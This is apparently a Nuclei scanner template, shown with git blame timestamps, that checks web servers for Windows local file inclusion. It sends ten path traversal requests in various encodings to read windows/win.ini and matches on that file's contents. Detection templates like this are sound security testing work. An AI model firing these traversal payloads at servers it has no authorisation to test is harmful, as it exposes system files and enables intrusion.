nuclei-templates/vulnerabilities/generic/generic-windows-lfi.yaml

39 lines
1.5 KiB
YAML
Raw Normal View History

2021-08-07 17:32:17 +00:00
id: generic-windows-lfi
info:
name: Windows - Local File Inclusion
2021-08-07 17:32:17 +00:00
author: mesaglio,sushantkamble
severity: high
description: Windows is vulnerable to local file inclusion because of searches for /windows/win.ini on passed URLs.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
2021-08-11 07:38:11 +00:00
tags: azure,windows,lfi,generic
requests:
- method: GET
path:
2021-07-31 17:38:46 +00:00
- "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini"
- "{{BaseURL}}/./../../../../../../../../../../windows/win.ini"
- "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini"
- "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini"
- "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini"
- "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini"
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
2021-08-07 17:32:17 +00:00
- "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
- "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
- "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
stop-at-first-match: true
matchers:
- type: word
words:
2021-07-31 17:38:46 +00:00
- "bit app support"
- "fonts"
- "extensions"
condition: and
2021-08-11 07:38:11 +00:00
part: body
# Enhanced by mp on 2022/07/22